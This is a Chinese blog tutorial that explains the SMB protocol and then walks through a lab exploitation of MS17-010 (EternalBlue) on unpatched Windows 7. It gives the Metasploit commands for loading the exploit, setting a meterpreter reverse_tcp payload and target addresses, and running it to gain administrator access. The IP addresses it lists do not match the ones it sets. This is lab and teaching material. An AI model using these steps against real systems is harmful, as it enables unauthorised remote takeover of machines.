SMB协议与永恒之蓝漏洞利用
一,SMB服务
SMB(全称为Server Message Block)是一个协议名,可用于在计算机间共享文件、打印机,串口等,电脑上的网上邻居就是靠他实现的;
SMB是一个应用层协议,可以工作在NETBIOS协议之上(TCP/139)或者TCP协议(TCP/445)之上;
SMB协议和NETBIOS协议在Windows主机默认安装;
SMB版本最新的是3.X,win7和vista是2.X。winXP是1.0主要的漏洞是由新版本的操作系统保持向下兼容带来,也就是说win10主机和winXP主机通过网络共享文件用的是SMB1.0协议;
SMB是一种客户机/服务器,请求/响应协议。通过SMB协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求;
SMB工作过程:版本协商——>客户端连接服务器认证——>客户端访问资源鉴定——>对共享资源进行操作;
微软官方文档[MS-SMB2]里提到SMBv2和SMBv3可统称为SMB 2协议,所以在Wireshark以及其他工具中便将高于smb2.0之后的协议统一为smb2。如果设备间使用了smbv3中新特性RDMA功能的则显示为SMBDirect协议;
配置SMB服务就是启动网络发现和打印机共享(如果网络设备为公用默认不开启时,则需要手动开启);
如果在Windows和Windows server中检测,启动和禁止SMBv1、SMB
v2和SMBv3请参考微软官方指南:
https://support.microsoft.com/zh-cn/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and利用kali可对著名的SMB漏洞——永恒之蓝,进行检测和利用;
https://blog.csdn.net/qq_36374896/article/details/81806764kali虚拟机镜像下载免费安装(免安装):
VM Homepage: https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/
SMB——永恒之蓝漏洞利用
一,实验环境
攻击机:kali
被攻击机:win7(未装补丁)或者Windows2008(于win7的步骤相同)
二,实验步骤
1、获取IP地址(通过ifconfig和ipconfig命令)
- kali-linux:192.168.139.139
- Windows7:192.168.139.2
2、通过“控制面板”——>“网络和Internet”——>“网络和共享中心”——>“更改高级共享设置”:启动打印机共享
3、kali-Linux输入msfconsole启动msf(若不是root登录,需sudo提升权限)
命令:root@kali:~# msfconsole
命令提示,显示msf启动成功
4、使用永恒之蓝漏洞
msf > use exploit/windows/smb/ms17_010_eternalblue
5、设置TCP连接
msf exploit (windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
6,设置靶机IP和操作机IP
操作机kali-Linux的——IP地址:192.168.139.139
靶机Windows7的——IP地址:192.168.139.129
msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 192.168.18.130 msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 192.168.18.129
7、进行攻击
msf exploit (windows/smb/ms17_010_eternalblue) > run
8、进行测试:
已获得Windows管理员权限!
SMB协议与永恒之蓝漏洞利用相关推荐
- 永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图
永恒之蓝漏洞利用(MS17-010) 文章目录 永恒之蓝漏洞利用(MS17-010) 一.永恒之蓝(MS17-010)介绍 二.漏洞利用 1.检测目标主机是否存在MS17-010漏洞 2.使用msf攻 ...
- MSF之ms17-010永恒之蓝漏洞利用
MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...
- MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...
- 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)
一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...
- 永恒之蓝漏洞利用及攻击
一.基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机.甚 ...
- 永恒之蓝漏洞利用攻击以及修复方法
靶机:Windows 7(有的版本有补丁) 攻击机:Kali 2021 首先保证可以互相ping 通 32位系统进去控制台会蓝屏 漏洞利用 用nmap的漏洞扫描模式,扫描过程按上下方向键即可查看扫描进 ...
- MS17-010永恒之蓝-漏洞利用+修复方法
前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. 该病毒是不法分子利用NSA(National Security Agenc ...
- 永恒之蓝漏洞ms17-010
本示例主要提供学习使用,不得用于违法犯罪 目录 什么是永恒之蓝 漏洞复现: 1.信息收集 2.进入MSF利用永恒之蓝漏洞模块 3.后渗透阶段 什么是永恒之蓝 永恒之蓝是指2017年4月14日晚,黑客团 ...
- 永恒之蓝漏洞复现(ms17-010)----保姆级教程
攻击机: kali Linux 靶机: win7 x64 提示: 复现攻击前请关闭杀毒软件 1.复现第一步按以下操作打开 445端口: 在 "运行" 里输 ...
最新文章
- python第三方库安装-多种方式
- 【控制】《现代控制理论》谢克明老师-第2章-线性控制系统状态空间表达式的求解
- SAP Spartacus layout设计原理
- MDK调试:设置断点处,代码运行的次数
- oracle 批量 重建索引,Oracle重建索引Shell脚本、SQL脚本分享
- dnn神经网络 缺点_抄近路神经网络如何因找捷径而犯错
- 【python与数据分析】Python与数据分析概述
- 2021深育杯-网络安全大赛专业竞赛部分wp
- 高中数学解析几何解题方法,2019高考生没有掌握方法!
- Python数据分析理论与实战完整版本
- 大公司都在用的招聘分析模型,会EXCEL就行,白嫖党不要错过
- 使用Navicat快速复制所有表的表名或字段名
- Installation and use of OpenWrt (x86) | Hardware
- STM32F103模拟IIC总线驱动四个VL53L0
- ap接口 php_cos-php-sdk-v5接口文档
- 图说Fourier变换
- read,readline 函数和 write 函数
- UltraEdit-32 v13.10+4 官方中文版
- 用bashdb调试RV1126的uboot make 脚本
- win10安装sshpass_Windows上SSH服务器的配置以及客户端的连接